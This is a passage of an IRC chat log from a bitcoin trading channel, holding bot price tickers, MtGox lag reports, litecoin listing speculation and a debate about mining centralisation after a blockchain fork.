BTC [-] Apr 03 11:06:02 [HAVELOCK] [SDICE] 8 @ 0.30000001 = 2.4 BTC [-] Apr 03 11:07:00 Holy shit, somebody paid $10000 for 70 btc Apr 03 11:07:02 [HAVELOCK] [SDICE] 5 @ 0.3 = 1.5 BTC [-] Apr 03 11:07:33 well one thing to perhaps look at is how btc traded after crossing 1USD and 10USD pyschological barriers. Haven't looked too closely yet.. as I'm pretty sure marekt conditions were quite different. Apr 03 11:08:02 [HAVELOCK] [VTX] 12 @ 0.431 = 5.172 BTC [-] Apr 03 11:08:37 ;;bids 100 Apr 03 11:08:37 There are currently 21209.86 bitcoins demanded at or over 100.0 USD, worth 2410540.73085 USD in total. | Data vintage: 73.5523 seconds Apr 03 11:11:02 [HAVELOCK] [HIM] 3 @ 1.93 = 5.79 BTC [-] Apr 03 11:12:01 [HAVELOCK] [VTX] 21 @ 0.479955 = 10.0791 BTC [+] Apr 03 11:16:00 ;;bids 120 Apr 03 11:16:02 There are currently 5670.2757 bitcoins demanded at or over 120.0 USD, worth 740933.924797 USD in total. | Data vintage: 0.0049 seconds Apr 03 11:20:30 ;;ticker Apr 03 11:20:31 BTCUSD ticker | Best bid: 145.50001, Best ask: 145.78998, Bid-ask spread: 0.28997, Last trade: 145.79000, 24 hour volume: 109826.82126183, 24 hour low: 102.50000, 24 hour high: 146.00000, 24 hour vwap: 118.31690 Apr 03 11:23:20 !ticker s.dice Apr 03 11:23:20 The vision of Christ that thou dost see ... is my vision's greatest enemy. Apr 03 11:23:24 !ticker m s.dice Apr 03 11:23:25 [MPEX:S.DICE] 1D: 0.00310001 / 0.00368235 / 0.00400173 (25821 shares, 95.08 BTC), 7D: 0.0031 / 0.00331583 / 0.00448 (718545 shares, 2,382.58 BTC), 30D: 0.00300001 / 0.00424531 / 0.006225 (1571439 shares, 6,671.26 BTC) Apr 03 11:31:27 so anyone remember when it ran from 10 to 30? I think the thing that popped it was the mtgox heist, no? Apr 03 11:31:57 What's more interesting is where it will go to after crashing, 10ish seems too low << i can tell you that the major players will inflict at least a 1/3 punishment to the lemmings putting price this high. Apr 03 11:32:02 so nothing over 100 is going to get bought. Apr 03 11:32:35 huh Apr 03 11:32:37 hey mp Apr 03 11:32:42 ello Apr 03 11:32:46 whats a url for a profitability calculator Apr 03 11:32:56 um. i have no idea. you're the miner neh ? Apr 03 11:33:17 I could calculate it by hand but meh Apr 03 11:33:49 [BTCTC] [ASICMINER-PT] 3 @ 0.78997 = 2.3699 BTC [+] Apr 03 11:38:29 ;;bids 95.7 Apr 03 11:38:31 There are currently 25483.015 bitcoins demanded at or over 95.7 USD, worth 2825225.0196 USD in total. | Data vintage: 0.0062 seconds Apr 03 11:38:43 ;;bids 50 Apr 03 11:38:44 There are currently 87921.054 bitcoins demanded at or over 50.0 USD, worth 7578933.5071 USD in total. | Data vintage: 12.7352 seconds Apr 03 11:38:57 ;; bids 0 Apr 03 11:38:57 There are currently 41207088 bitcoins demanded at or over 0.0 USD, worth 10375480.9223 USD in total. | Data vintage: 26.0924 seconds Apr 03 11:39:29 ;;asks 155 Apr 03 11:39:30 There are currently 5051.1155 bitcoins offered at or under 155.0 USD, worth 756571.619693 USD in total. | Data vintage: 58.6891 seconds Apr 03 11:39:36 mtgox in a perpetual state of lag haha Apr 03 11:40:10 now its not even enough to predict future prices, you also have to predict current ones when you entry Apr 03 11:40:14 rofl Apr 03 11:41:12 how does trading even function with lag? Apr 03 11:41:36 [MPEX] [S.MPOE] 15600 @ 0.0006815 = 10.6314 BTC [+] Apr 03 11:41:37 [MPEX] [S.MPOE] 10000 @ 0.00068372 = 6.8372 BTC [+] Apr 03 11:41:38 [MPEX] [S.MPOE] 5000 @ 0.00068373 = 3.4187 BTC [+] Apr 03 11:41:39 what do you mean Apr 03 11:41:45 [MPEX] [S.MPOE] 6000 @ 0.00068777 = 4.1266 BTC [+] Apr 03 11:41:54 [BTCTC] [ASICMINER-PT] 1 @ 0.771 BTC [-] Apr 03 11:42:00 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Apr 03 11:42:04 lag means you don't know trades were executed until some time in the future? Apr 03 11:42:22 well, it means that the orderbook you are seeing right now is 3 minutes old Apr 03 11:42:25 or Apr 03 11:42:41 if you send an order now, it will take the lag time until it shows on the orderbook Apr 03 11:43:05 damn 5:45 and growing Apr 03 11:43:13 wonder if that is people selling? Apr 03 11:43:30 5:45? Apr 03 11:43:33 watch for the drop Apr 03 11:43:43 | Lag: 6:12.618 Apr 03 11:43:49 oh, ya Apr 03 11:43:57 i havent found out the correlation Apr 03 11:44:00 except volatility Apr 03 11:44:45 mpex bots seem to shutdown when there is lag? Apr 03 11:45:54 bgupta not rly. Apr 03 11:46:16 seems like my lag theory was correct Apr 03 11:46:23 from couple days ago Apr 03 11:46:30 the bot puts them in the book with an expiration time Apr 03 11:46:31 book getting spammed with 0.01 orders Apr 03 11:46:40 sometimes that comes a little (like, seconds) before the bot gets to put the new set in Apr 03 11:47:10 on the other hand if the bot can't get price feed it won't quote Apr 03 11:47:54 Lag crosse 7:00 Apr 03 11:48:48 its happening Apr 03 11:48:52 ;;ticker Apr 03 11:48:52 BTCUSD ticker | Best bid: 140.22000, Best ask: 141.00100, Bid-ask spread: 0.78100, Last trade: 140.22000, 24 hour volume: 109826.82126183, 24 hour low: 102.50000, 24 hour high: 146.00000, 24 hour vwap: 118.31690 Apr 03 11:48:59 yeah, big drop it seems Apr 03 11:49:06 could have just been one sell though Apr 03 11:49:12 too much lag to tell... Apr 03 11:49:22 now in 7 minutes lets see what happens then Apr 03 11:49:56 fuck, my funds arrived, but just a tad too late Apr 03 11:50:02 ;;la Apr 03 11:50:02 Error: "la" is not a valid command. Apr 03 11:50:07 ;;lag Apr 03 11:50:07 Error: "lag" is not a valid command. Apr 03 11:50:15 goxlag Apr 03 11:50:16 ;;goxlag Apr 03 11:50:16 MtGox lag is 468.536678 seconds. During this time, light travels 0.938942256714 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 03 11:50:23 taub, too late too sell? Apr 03 11:50:23 lmao Apr 03 11:50:25 nanotube ^ Apr 03 11:50:43 or too late to buy puts? Apr 03 11:51:04 well, too late to catch this particular move that just happend Apr 03 11:51:18 via coins or options? Apr 03 11:51:22 i'm confident i'll get my fill still in the next 7 mins, the order got sent before the big drop Apr 03 11:51:26 options bots weren't quotin Apr 03 11:51:29 i dont trade options Apr 03 11:51:33 ahh. Apr 03 11:51:50 okay now it goes down further, :( bummer Apr 03 11:52:00 how can you tell? Apr 03 11:52:16 carkmoody seems stuck Apr 03 11:52:22 not for me Apr 03 11:52:26 http://bitcoincharts.com/charts/ yup it's down Apr 03 11:52:43 141/142 range? Apr 03 11:52:43 do you got linuix? Apr 03 11:52:45 or lower? Apr 03 11:52:54 best bid is 139.9 Apr 03 11:53:16 ;;goxlag Apr 03 11:53:17 MtGox lag is 563.040692 seconds. During this time, light travels 1.12832724265 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 03 11:53:24 http://prof7bit.github.com/goxtool/ this is good too Apr 03 11:53:49 Lagbets heh Apr 03 11:55:23 ;;bids 140 Apr 03 11:55:25 There are currently 0 bitcoins demanded at or over 140.0 USD, worth 0.0 USD in total. | Data vintage: 0.0043 seconds Apr 03 11:55:44 ah there it goes Apr 03 11:56:01 ;;ticker Apr 03 11:56:02 BTCUSD ticker | Best bid: 138.83060, Best ask: 143.19999, Bid-ask spread: 4.36939, Last trade: 138.83060, 24 hour volume: 109826.82126183, 24 hour low: 102.50000, 24 hour high: 146.00000, 24 hour vwap: 118.31690 Apr 03 11:56:06 really wide spread Apr 03 11:56:16 dude i'm so impressed. the market listened. thank you! Apr 03 11:57:02 mircea_popescu: You want it back to 95? Apr 03 11:57:16 no. i just don't want it to bubble. Apr 03 12:02:06 ;;goxlag Apr 03 12:02:07 MtGox lag is 521.994696 seconds. During this time, light travels 1.04607152624 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 03 12:02:52 love the new gribble text. Apr 03 12:03:50 ;;ticker Apr 03 12:03:58 BTCUSD ticker | Best bid: 132.15805, Best ask: 139.00000, Bid-ask spread: 6.84195, Last trade: 139.00000, 24 hour volume: 109826.82126183, 24 hour low: 102.50000, 24 hour high: 146.00000, 24 hour vwap: 118.31690 Apr 03 12:04:11 132 <-> 139 Apr 03 12:04:31 must be midnight somewhere Apr 03 12:04:41 its not accurate Apr 03 12:04:59 no trades have been placed for 10 minutes Apr 03 12:06:48 ;;bcstats Apr 03 12:06:50 Current Blocks: 229457 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 366 blocks | Next Difficulty In About: 2 days, 1 hour, 20 minutes, and 53 seconds | Next Difficulty Estimate: 7768579.67908 | Estimated Percent Change: 16.02123 Apr 03 12:06:59 [MPEX] [S.MPOE] 7600 @ 0.00068777 = 5.2271 BTC [+] Apr 03 12:11:53 wow Apr 03 12:11:59 this is fun Apr 03 12:12:56 is it goxlag understood, and perhaps fixable by the exchange? Apr 03 12:13:03 lol Apr 03 12:13:14 of course its fixable Apr 03 12:13:19 these are solved problems Apr 03 12:13:25 ;;ticker Apr 03 12:13:26 BTCUSD ticker | Best bid: 133.28100, Best ask: 136.99000, Bid-ask spread: 3.70900, Last trade: 136.99000, 24 hour volume: 109826.82126183, 24 hour low: 102.50000, 24 hour high: 146.00000, 24 hour vwap: 118.31690 Apr 03 12:13:30 there is a global forex market where trillions of dollars are traded every day Apr 03 12:13:34 ;;goxlag Apr 03 12:13:35 MtGox lag is 311.754968 seconds. During this time, light travels 0.624753465289 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 03 12:13:38 and they don't wait 5 minutes for an order Apr 03 12:13:40 crash Apr 03 12:14:44 Bowjob you referring to price or the functionality of mtgox ;) Apr 03 12:14:46 you gotta love how wide this spread is Apr 03 12:18:12 sigh for most of that apike and drop mpex bots weren't quoting.. Apr 03 12:18:20 lol <<< this. Apr 03 12:18:33 bgupta http://bitcoincharts.com/charts/ was offline. Apr 03 12:18:44 ahh... Apr 03 12:18:52 now i see "invalid symbol" Apr 03 12:19:16 still getting 502 but quotes did come back.. Apr 03 12:19:28 at least a min ago they were there Apr 03 12:19:59 i was mostly joking about 188 calls... Apr 03 12:20:09 and being limited by 200 strike Apr 03 12:20:10 bgupta it probably managed to pull one. Apr 03 12:20:38 ;;ticker Apr 03 12:20:38 BTCUSD ticker | Best bid: 132.10000, Best ask: 132.80000, Bid-ask spread: 0.70000, Last trade: 132.80000, 24 hour volume: 113914.00406253, 24 hour low: 103.59000, 24 hour high: 147.00000, 24 hour vwap: 119.79724 Apr 03 12:20:59 24 hour volume: 113914.00406253 Apr 03 12:21:06 ;;goxlag Apr 03 12:21:06 MtGox lag is 76.788317 seconds. During this time, light travels 0.153882927503 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 03 12:22:05 buy wall at 130 Apr 03 12:23:32 lag spiking again Apr 03 12:24:51 nice Apr 03 12:24:58 ;;asks 150 Apr 03 12:25:01 There are currently 11975.009 bitcoins offered at or under 150.0 USD, worth 1746325.8334 USD in total. | Data vintage: 100.2402 seconds Apr 03 12:25:02 ;;bids 100 Apr 03 12:25:02 There are currently 20939.625 bitcoins demanded at or over 100.0 USD, worth 2330617.2525 USD in total. | Data vintage: 102.0011 seconds Apr 03 12:33:33 [MPEX] [S.MPOE] 1400 @ 0.00068777 = 0.9629 BTC [+] Apr 03 12:33:35 [MPEX] [S.MPOE] 10250 @ 0.00069537 = 7.1275 BTC [+] Apr 03 12:38:12 did they close the SA thread? Apr 03 12:43:12 ltc near $5 lol Apr 03 12:43:34 kinda surprised LTC is so affected by btcusd Apr 03 12:44:22 i think its just funny it went up like 10,000% in 2 months or so Apr 03 12:44:31 ltc spiked on mtgox rumors, that's all I think Apr 03 12:44:44 moe than just rumors Apr 03 12:44:57 more* Apr 03 12:45:07 well, tux said it would be easy to do, but didn't say he would. Apr 03 12:45:12 once gox lists it, it should trade in the 1/10th to1/5th of btc price Apr 03 12:45:19 SOunded positive for it happening though Apr 03 12:45:28 he said he was not ready to say when "soon" would be Apr 03 12:46:02 I wish he would fix the broken shit, before adding litecoin Apr 03 12:46:04 its not a rumour anymore Apr 03 12:46:16 gox is rolling out ltc/nmc 'soon' Apr 03 12:46:20 ah which accounts for the selloff Apr 03 12:46:26 check topic in #mtgox Apr 03 12:46:27 nmc too? lol Apr 03 12:46:56 I suggested that maybe the concentrate on supporting btc first Apr 03 12:47:41 ltc I sorta get. nmc, seems kinda sily. Apr 03 12:47:45 i just sold 900 nmc lol and now its way way up Apr 03 12:47:50 next they'll be doing devcoin Apr 03 12:47:53 nmc does a lot more than ltc Apr 03 12:48:12 bgupta, source Apr 03 12:48:14 ? Apr 03 12:48:22 devcoin d oes not align with profits. Apr 03 12:48:23 he is kidding Apr 03 12:48:25 that was sarcasm Apr 03 12:48:28 lol ok. Apr 03 12:48:34 BTE us bext Apr 03 12:48:37 next* Apr 03 12:50:22 once gox lists it, it should trade in the 1/10th to1/5th of btc price << eh get out. Apr 03 12:50:40 want to make a bet? :) Apr 03 12:50:45 go aheasd Apr 03 12:50:50 like 1 month after the list it Apr 03 12:50:54 they Apr 03 12:50:56 eh no Apr 03 12:51:00 it should be in that range Apr 03 12:51:03 oh lol Apr 03 12:51:12 people hear about bitcoin in the news, not litecoin Apr 03 12:51:41 I think the point being that if litecoin gets listed it will be in the news too Apr 03 12:51:42 1/10 ltc only needs to go up to $13 Apr 03 12:52:00 3 x Apr 03 12:52:02 yeah, just wait.. 250% for ltc is nothing Apr 03 12:52:14 it just went up 10,000% Apr 03 12:52:40 well basically... if that happens ltc is fucked Apr 03 12:52:45 i don't much care either way. Apr 03 12:53:02 is lag a constant thing? Apr 03 12:53:12 never really paid close attention Apr 03 12:53:25 bgupta, yup gox has a history of lag Apr 03 12:53:26 pretty much Apr 03 12:54:14 i love the new au feature of goxlag Apr 03 12:54:58 ltc is fucked? how so Apr 03 12:55:01 So is 147 the all time and foreever new high for btc? Apr 03 12:55:46 [BTCTC] [B.YABMC] 1 @ 0.01201 BTC [+] Apr 03 12:55:51 [BTCTC] [B.YABMC] 9 @ 0.012 = 0.108 BTC [-] Apr 03 12:56:30 carniwhore = girl who puts out for carnations. Apr 03 12:56:44 just wait till ltc gets more transactions Apr 03 12:56:51 bgupta no. but for 2013 hopefully. Apr 03 12:56:54 you'd see all the "LTC is faster!" guys complain that their TX isn't making it into a block Apr 03 12:56:56 [BTCTC] [BTC-TRADING-PT] 1 @ 0.14301 BTC [-] Apr 03 12:57:18 is mtgox the main place to do fiat/btc trading? (I know they have like 70% or something, but they have wierd transfer limits and stuff. Apr 03 12:57:37 bgupta, they have the biggest orderbook iirc, but not the only place obviously Apr 03 12:58:02 is that where people in this channel trade? Apr 03 12:58:03 [BTCTC] [BTC-TRADING-PT] 1 @ 0.143 BTC [-] Apr 03 12:58:10 bgupta, no, this is bitcoin assets Apr 03 12:58:21 #mtgox Apr 03 12:58:25 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1421 BTC [-] Apr 03 12:58:31 bgupta they had something like 70% a year ago. Apr 03 12:58:38 atm they're struggling to keep a third. Apr 03 12:58:58 what''s the next biggest, or is it really ditributed? Apr 03 12:59:00 [BTCTC] [GSDPT] 124 @ 0.00362 = 0.4489 BTC [-] Apr 03 12:59:16 guessing we all still follow gox since they are still the biggest? Apr 03 12:59:27 kinda distributed Apr 03 12:59:29 well I do. Apr 03 12:59:33 IE: options are priced against gox Apr 03 12:59:42 options are priced against all exchanges. Apr 03 12:59:46 ;;ticker Apr 03 12:59:46 BTCUSD ticker | Best bid: 128.93917, Best ask: 129.80000, Bid-ask spread: 0.86083, Last trade: 128.93917, 24 hour volume: 119765.32170538, 24 hour low: 103.75000, 24 hour high: 147.00000, 24 hour vwap: 120.69408 Apr 03 12:59:49 gox is about 70% of that. Apr 03 12:59:56 the exchange market is roughly half tho, otc is pretty big Apr 03 13:00:02 and then there's the private traders Apr 03 13:00:06 OTC usually relies on gox price. Apr 03 13:00:13 only for small trades. Apr 03 13:00:17 And then there's the FastCash4Bitcoins and Bitcoins Direct Apr 03 13:00:59 sure but those are like gox +/- XX%, no? Apr 03 13:01:18 private traders, sounds interesting.. Apr 03 13:01:35 but yes, mtgox does have an overextended and unjustified impact on price formation. Apr 03 13:01:40 like street trading? Apr 03 13:01:43 if that's what you were asking Apr 03 13:01:49 kinda was. Apr 03 13:01:55 i don't know what street has to do with anything ? Apr 03 13:02:01 for a site that is prety broken.. Apr 03 13:02:04 private as in i know about it, you don't. Apr 03 13:02:05 private. Apr 03 13:02:25 well, it's like otc, not an exchange. Apr 03 13:02:30 but not in channel Apr 03 13:02:34 the exchange market is roughly half tho, otc is pretty big <<< Apr 03 13:03:03 I imagine that folks that need to move large amounts don't use standard gox Apr 03 13:03:09 it looks like there aer some big fish getting in Apr 03 13:03:24 the volume is very high Apr 03 13:03:34 ;;bids 0 Apr 03 13:03:36 There are currently 41180994 bitcoins demanded at or over 0.0 USD, worth 10343612.1046 USD in total. | Data vintage: 0.0109 seconds Apr 03 13:03:45 was about 10mn for a while neh ? Apr 03 13:04:01 bugpowder would be happy with those numbers Apr 03 13:04:41 a lotof btc transactions happen outside of an exchange, ihave not use an exchange in well over a year (other than btc-e for ltc) Apr 03 13:05:09 yeah, the bitcoin atm will prob do very well at extending that trend Apr 03 13:05:32 I don't plan to use btc/fiat echanges any time soon, at least not gox.. as I'm in US and the whole rcoinlab thing seems a shame Apr 03 13:05:50 bgupta: why? Apr 03 13:05:58 also, bitfloor is in the US Apr 03 13:06:03 ;;goxlag Apr 03 13:06:04 MtGox lag is 119.238373 seconds. During this time, light travels 0.238952364433 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 03 13:06:07 and so far its been good to me, though YMMV Apr 03 13:06:41 well as soon as I convert to fiat, it's subject to trading taxes.. and coinlab reports. Apr 03 13:07:10 that's why i said bitfloor Apr 03 13:07:24 AND...it is worth paying taxes if the money is right Apr 03 13:07:49 at least from my current reading of the rules… staying in btc means that I am not subject to taxes. Apr 03 13:08:29 I was actually wondering if it would work to setup a subsidiary of a US company to do the trading.. and report the profits overseas in a low tax environment. Apr 03 13:08:35 mircea_popescu: you were one of the first to offer financial company news over twitter, lol SEC agrees Apr 03 13:08:37 (Assuming there are profits of course) Apr 03 13:08:46 oh yes of course Apr 03 13:08:53 i meant use exchanges to move from fiat to btc Apr 03 13:09:04 which is usually the bottleneck Apr 03 13:09:40 ;;ticker Apr 03 13:09:45 BTCUSD ticker | Best bid: 131.00000, Best ask: 131.05362, Bid-ask spread: 0.05362, Last trade: 131.00000, 24 hour volume: 119771.38207326, 24 hour low: 103.75000, 24 hour high: 147.00000, 24 hour vwap: 120.69450 Apr 03 13:10:07 ;;calc 120.69450 * 119771.38207326 Apr 03 13:10:07 14455747.0736 Apr 03 13:10:19 14 mill in last 24 hours... Apr 03 13:10:46 ;;calc 14455747 * .006 Apr 03 13:10:46 86734.482 Apr 03 13:10:52 not a bad day for gox Apr 03 13:11:05 maybe lag is a feature not a bug? Apr 03 13:11:32 mjr_ hm ? Apr 03 13:11:40 so how common is bitcoincharts crashing? Apr 03 13:11:55 (It kinda shuts down options trading to some extent) Apr 03 13:12:02 [HAVELOCK] [SDICE] 1 @ 0.35499999 BTC [+] Apr 03 13:12:06 timing kinda sucked this AM Apr 03 13:12:47 its more common than it should be. Apr 03 13:13:01 [HAVELOCK] [SDICE] 2 @ 0.35499999 = 0.71 BTC [+] Apr 03 13:13:06 i find short term option plays difficult anyway Apr 03 13:13:09 damn it's down again Apr 03 13:13:19 and i dont think they can be used like that right now Apr 03 13:13:25 http://www.foxbusiness.com/government/2013/04/02/sec-social-media-ok-for-company-announcements/ Apr 03 13:13:31 they are too expensive, and orient themselves on the average price over the last 24h Apr 03 13:13:34 a lol Apr 03 13:13:49 so, maybe for mid to longer term speculation Apr 03 13:14:04 mircea_popescu: Do you find bitcoincharts down a lot or is this unusal? Apr 03 13:14:17 they were down for two days straight at some point. Apr 03 13:14:34 no better quote source that's more stable? Apr 03 13:14:35 while the guy had some sort of emotional breakdown Apr 03 13:14:45 not afaik, at least yet. maybe emerging. Apr 03 13:14:57 it's a pointless dog to chase atm, we have much bigger problems Apr 03 13:15:17 too much new money? Apr 03 13:15:37 goxlag. Apr 03 13:15:40 for instance. broken code, delusive geeks, mtgox going down Apr 03 13:15:45 bunch of security breaches Apr 03 13:16:05 Security breaches? Like Instawallet? Apr 03 13:16:06 the newsfeed going down in all this is cosmetic, what's the value of it being up if gox lag is on the 1.2AU level ? Apr 03 13:16:12 delusive as in deceitful? Apr 03 13:16:14 Schadenfreude and the brazil thing Apr 03 13:16:18 and the whatever else Apr 03 13:16:24 bgupta nu, like hallucinating. Apr 03 13:17:17 ah, the english word I would use is delusionary.. delusive, is more like deceitful. Apr 03 13:17:25 i am aware. Apr 03 13:17:32 Brazil thing? Apr 03 13:17:39 take the recent fork disaster. it being passed off as a great success, what's that ? Apr 03 13:17:49 claiming miners vote and thus there's legitimity, what's that ? Apr 03 13:17:57 getting darned close to the line. Apr 03 13:18:11 Schadenfreude http://trilema.com/2013/and-another-one-bites-the-dust-mercado-bitcoin/ Apr 03 13:18:21 Thanks Apr 03 13:19:20 eh, they dodged a bullet, (IE: were lucky) and Bitcoin foundation chief made losing fork folks whole. And they figured out how to avoid issue in future. Apr 03 13:20:08 I supose it has it's bad and good. broken code got fixed… bad that broken code existed for so long, even though people knew about it Apr 03 13:20:36 the loss of distributed mining is a big issue Apr 03 13:20:45 (I agree with you there) Apr 03 13:21:16 Schadenfreude iof we believe the frenchies (ie, no funds lost) then the brazil thing is way weorse. Apr 03 13:21:28 bgupta you don't follow. Apr 03 13:21:30 mircea_popescu, add bitcoinrain to the mix Apr 03 13:21:40 the longer chain was sunk by collusion between people. this is hallmark centralisation. Apr 03 13:21:47 TradeFortress i missed that one ? Apr 03 13:21:58 it's operated by the same guy Apr 03 13:22:00 Any estimate on how much money was lost in the brazil incident? Apr 03 13:22:11 strangely how it went down after me & a few members requested large withdrawls. Apr 03 13:22:13 Schadenfreude probably in the millions from what people were saying. no idea. Apr 03 13:22:19 TradeFortress ah Apr 03 13:22:42 bgupta i agree that a correctly functioning bitcoin would have been fucked in that situation, and so "good" that it was broken. Apr 03 13:22:43 srsly, "You will get the bitcoins tommorow", tommorow -> site down, 'hacked' Apr 03 13:22:48 buyt this doesn't change the fact that it's broken. Apr 03 13:22:55 tsk. Apr 03 13:22:58 suspicious this Apr 03 13:23:05 how large is large TradeFortress ? Apr 03 13:24:10 about 400 btc total was the withdrawls I know of, but I'm not sure how much coins were lost in bitcoinrain Apr 03 13:29:12 wait Apr 03 13:29:18 was this rain thing some sort of ponzi ?! Apr 03 13:30:59 mircea_popescu: You are correct I don't understand.. I only understand the technical issue with the fork, not the economic or social implications.. is there a more theorough analysis out there? Apr 03 13:31:19 not really, i guess. Apr 03 13:31:31 but logically thinking : bitcoin is sold as being decentralised, right ? Apr 03 13:31:58 [MPEX] [S.MPOE] 3900 @ 0.00069537 = 2.7119 BTC [+] Apr 03 13:32:19 collusion is not the same as centralization though the effects can be similar Apr 03 13:32:39 explain this difference ? Apr 03 13:33:14 the colluding parties are still separate entitites, and may not collude in perpetuity ? Apr 03 13:33:25 a, yes. my statement above suffers. Apr 03 13:33:56 the case was quite plain central planning : devs said do x, pool op did x. Apr 03 13:34:01 yes, that is the difference, but also...you could say that everyone buying bitcoins is "colluding" to raise the price, all our actions are working towards the same goal Apr 03 13:34:15 same effect yes, same goal not really. Apr 03 13:34:22 or you could say that 51% of voters colluded to elect the candidate they prefer Apr 03 13:34:46 mjr_ but to make that work in the case at hand, parish head told people to vote for x, they did. Apr 03 13:34:49 if the bitcoin foundation could have unilaterally negated the fork...centralization Apr 03 13:34:51 is this democratic process iyo ? Apr 03 13:35:15 mjr_ it's not they could have. they in fact did. (and not the bitcoin foundation either, that's an irrelevant little scam by now) Apr 03 13:35:24 well...the fact that the choice remained with them means that you may get centralization in effect, but not in cause Apr 03 13:35:30 granted. Apr 03 13:35:34 but it's still there. Apr 03 13:35:52 you have to presume some choice was made. i have my doubts those heads were working. Apr 03 13:35:55 i just mean that you could have lobbied for the longer chain...or miners who wanted to continue that path could have Apr 03 13:36:18 the btc guild guy made a choice that cost his miners ~1-2k btc Apr 03 13:36:18 so in the end, whoever can convince the most people will change the course of history...par for the course Apr 03 13:36:23 this is irrational on the face. Apr 03 13:36:32 well, i agree Apr 03 13:36:36 right. Apr 03 13:36:43 so it still doesn't escape the central planning issue. Apr 03 13:36:52 but i think they took into account the fact that a fork could have damaged their long term gains into account Apr 03 13:36:52 a move was made that was irrational. Apr 03 13:37:00 how do you know this to be the case ? Apr 03 13:37:06 maybe they were just sheepishly following ? Apr 03 13:37:15 i don't know, they could have been sheepishly following Apr 03 13:37:18 right. Apr 03 13:37:20 but that is their choice Apr 03 13:37:22 to follow Apr 03 13:37:23 so it's a problem, all i'm sayin'. Apr 03 13:37:30 and they earn the right to do so by having the mining power Apr 03 13:37:36 oh i agree its a problem Apr 03 13:37:38 i am not disputing their right here. Apr 03 13:37:46 i am just trying to delineate the heavier problems we face, Apr 03 13:37:51 kinda where discussion started Apr 03 13:38:00 but at the end of the day, "the market decides" and it decides to follow gavin i guess Apr 03 13:38:11 except it wasn't the market, Apr 03 13:38:14 and it wasn't even the miners Apr 03 13:38:17 it was two doods. Apr 03 13:38:19 yes Apr 03 13:38:25 and everyone who chooses to use a pool Apr 03 13:38:31 specifically that pool Apr 03 13:38:33 except nobody chooses to use a pool Apr 03 13:38:38 everyone uses a pool because that's what you do Apr 03 13:38:45 you can solo mine... Apr 03 13:38:46 there's a lot of weakness baked in at all junctures. Apr 03 13:38:55 well you can chose a particular pool... Apr 03 13:39:03 now with asics i think you will see more solo mining Apr 03 13:39:07 bgupta except there's no really distinct ones. Apr 03 13:39:08 at least i hope Apr 03 13:39:13 mjr_ perhaps. Apr 03 13:39:24 even reddit is aware of the dangers of too few and big pools Apr 03 13:39:24 and when deepbit got close to 50% a bunch of miners left Apr 03 13:39:33 obviously as market matures, idiots get pushed out, more money more competence etc stuff will improve. Apr 03 13:39:35 also...at the end of the day, miners, and all bitcoin users do rely on the software used to run the network Apr 03 13:39:38 but that doesn't change what things are yet. Apr 03 13:39:49 ;; ticker Apr 03 13:39:52 BTCUSD ticker | Best bid: 137.10522, Best ask: 137.98997, Bid-ask spread: 0.88475, Last trade: 137.98997, 24 hour volume: 119771.38207326, 24 hour low: 103.75000, 24 hour high: 147.00000, 24 hour vwap: 120.69450 Apr 03 13:39:55 so if someone releases something that is obviously borked Apr 03 13:40:05 not that this was the case Apr 03 13:40:15 i thought the roll back was stupid...why go to the incorrect chain Apr 03 13:40:25 mjr_ i don't think they had a choice tbh. Apr 03 13:40:29 why not force old version to upgrade Apr 03 13:40:50 well...i think there is always a choice, but i also think most are too stupid to make one, but no choice is a choice Apr 03 13:40:58 a choice for the status quo Apr 03 13:41:28 i wonder...what would have happened if they hadn't...hard to tell at this point Apr 03 13:41:29 so tons of drama over betsofbitco.in marking BFL shipping apr 1 as draw :P Apr 03 13:41:34 mp btc guild pays for orphand blocks, he lost the 1k oins not the miners Apr 03 13:41:42 well, they tried to game the system Apr 03 13:42:07 ChaangNoi doesn't change much in the equation Apr 03 13:42:12 ChaangNoi, didn't gmaxwell or gavin donate it? Apr 03 13:42:16 to pools affected. Apr 03 13:42:19 (and gavin paid him iirc anyway - moar central planning nonsense() Apr 03 13:42:30 central planning from his own coins so. Apr 03 13:42:36 TradeFortress draw ? how is it a draw ?! Apr 03 13:42:50 TBH i think that most people cannot face this brave new world Apr 03 13:43:02 mircea_popescu, I'm guessing owner bet a lot of coins on them shipping. Apr 03 13:43:06 i was not picking a side here, just correcting what was said Apr 03 13:43:08 and we will see banks that use bitcoins, deposit insurance, chargebacks etc Apr 03 13:43:17 TradeFortress ok but it creatges this pernicious "listen to us and we'll insulate you ferom marketplace effects". it's how clinton destroyed the us banking sector Apr 03 13:43:22 "lend to black people no matter what" Apr 03 13:43:27 lol Apr 03 13:43:32 now the dems don't want to sell their own houses wives and daughters to pay for it Apr 03 13:43:35 cause ... why, right ? Apr 03 13:43:57 hey, you can ask me to lend to whoever you want...if i do it...my fault Apr 03 13:44:02 TradeFortress nasty shit. Apr 03 13:44:04 if you force me, your fault Apr 03 13:44:08 kakobrekla ^ check it out lol Apr 03 13:44:16 mjr_ what if i tell you that Apr 03 13:44:16 mpoe bots base prices on 24 hour moving average? Apr 03 13:44:22 no force in btc, acquiescence but not force Apr 03 13:44:26 a. i am your regulator, if you don't i'll fuck you with my nonsensical regulations Apr 03 13:44:33 and b. if you do do it i will insulate you from market downturn Apr 03 13:44:33 ? Apr 03 13:44:39 bgupta yes Apr 03 13:44:51 does that not change the payout spectrum in your favor to do it Apr 03 13:44:53 mircea_popescu, that is a problem when there's really only one bitcoin client Apr 03 13:45:00 what would have happened if not everyone used satoshi client Apr 03 13:45:01 TradeFortress very much so. Apr 03 13:45:18 $avg Apr 03 13:45:20 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 13:45:22 answer: nothing would have happened, 10% of the users would be unable to trust transactions until they upgrade. Apr 03 13:45:29 in the future that will happen...but you will still have issues where people rely on software and are beholden to the developers of said software Apr 03 13:45:30 ;;ticker Apr 03 13:45:31 BTCUSD ticker | Best bid: 135.50000, Best ask: 135.84774, Bid-ask spread: 0.34774, Last trade: 135.30003, 24 hour volume: 119771.38207326, 24 hour low: 103.75000, 24 hour high: 147.00000, 24 hour vwap: 120.69450 Apr 03 